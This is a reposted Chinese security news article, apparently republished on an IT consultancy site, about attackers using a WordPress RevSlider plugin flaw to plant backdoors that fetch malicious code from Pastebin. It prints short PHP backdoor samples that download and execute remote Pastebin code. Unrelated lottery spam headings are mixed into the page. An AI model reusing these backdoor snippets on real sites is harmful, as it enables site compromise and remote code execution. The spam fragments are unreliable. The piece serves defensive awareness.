品牌/運營/管理/IT綜合咨詢
IT/互聯網+解決方案
業務及咨詢:13919290690
售后支持:18693088690
[email protected]
[email protected]

湖南快乐十分官方开奖结果:隱匿在Pastebin上的后門

一定牛山东老十一选五走势图 www.rfnvy.com 睿達科網絡提供:蘭州網站建設/蘭州網站制作/蘭州網站設計/微信開發/SEO/代運營等服務…… 瀏覽更多產品服務

快速分享文本、代碼的網站Pastebin常常被黑客們用來分享自己的庫、竊取的數據和其他代碼,而現在它真的被用于黑客攻擊了。

近日安全研究人員居然發現黑客們正在通過Gmail草稿、Evernote等平臺控制僵尸網絡。安全公司Sucuri最近發布的博文介紹了一種新玩法:黑客利用流行的WordPress插件RevSlider的老版本漏洞傳播新的后門變種,使用Pastebin.com放置惡意軟件。下面就讓我們一起來看看黑客們的新創意吧。

2.png

Sucuri公司近日發表了一篇博客,該博客詳細解釋了黑客是如何利用舊版本的RevSlider WordPress插件來傳播一種新型后門,而該后門利用Pastebin.com網站服務來托管惡意代碼文件。

惡意軟件高級研究員Denis Sinegubko在博客中寫道:

“這或多或少可以算得上是一個典型的后門。它從遠程服務器下載惡意代碼,并在受害網站上將這些惡意代碼保存到一個文件中,使其隨時可被執行。不過,比較有趣的一點是其遠程服務器的選擇,黑客既沒將惡意代碼文件托管在自己的網站,也不是肉雞網站,而是在最受歡迎的Web應用網站Pastebin.com上?!?br/>攻擊者通過掃描目標網站來尋找含有漏洞的RevSlider插件。一旦發現,他們會利用RevSlider的另一個漏洞將后門代碼上傳到該網站。

if(array_keys($_GET) == 'up'){
$content = file_get_contents("//pastebin.com/raw.php?i=JK5r7NyS");
if($content){unlink('evex.php');
$fh2 = fopen("evex.php",'a');
fwrite($fh2,$content);
fclose($fh2);
}}else{print "test";}

關鍵后門代碼

這是一份稍微復雜點的后門樣本,是通過RevSlider漏洞上傳的:

3.png

從截圖中你可以看到這段代碼將一段經過Base64編碼的內容注入WordPress核心文件wp-links-opml.php中的$temp變量。以下是經過解密的$temp內容:

4.png

你可以看到它從Pastebin下載代碼并立即執行。但這次只有當攻擊者提供wp_nonce_once中的請求參數,也就是Pastebin的文章ID時才會運行。wp_nonce_once參數的使用使得管理員難以追蹤惡意代碼的具體地址(防止了網址被屏蔽),同時又增加了后門的靈活性———這樣它就能夠下載執行任何Pastebin上的代碼——哪怕是那些一開始不存在的代碼————只需要向wp-links-opml.php提供ID就行了。

FathurFreakz編碼器

印度尼西亞黑客們有一款編碼器與Pastebin配合默契。名字叫做PHP Encryptor by Yogyakarta Black Hat 或者是 by FathurFreakz。在 Pastebin.com網站上粘帖創建PHP代碼,軟件就會加密那個Pastebin網址,生成混淆后的代碼:

5.png
解密后:

function FathurFreakz($ct3){
xcurl('//pastebin.com/download.php?i='.code($ct3));
}
FathurFreakz(CODE);

這段代碼會下載執行Pastebin上的代碼(使用xcurl函數),ID在CODE常量中,并且經過加密。你可以看到另外一種Pastebin網址種類:download.php,基本上它跟raw.php一樣,但它提供HTTP頭,使得瀏覽器不會顯示內容,而是直接以文件形式下載。
經過解密的代碼(看起來他們超愛用Pastebin……):

6.png

給站長們敲響警鐘

黑客在實時攻擊的時候大規模利用Pastebin網站,這給網站管理員敲響了警鐘,提示他們要時刻維護網站的CMS(內容管理系統)以防止插件被惡意利用。

就在幾周前,一款新型針對WordPress的惡意軟件SoakSoak,其主要攻擊手段也是通過RevSlider的漏洞,上傳一個后門,然后對所有使用相同服務器的網站進行感染。當時SoakSoak攻陷了約10萬個WordPress站。

本文來源于://www.freebuf.com


嘿!有什么能幫到您的嗎?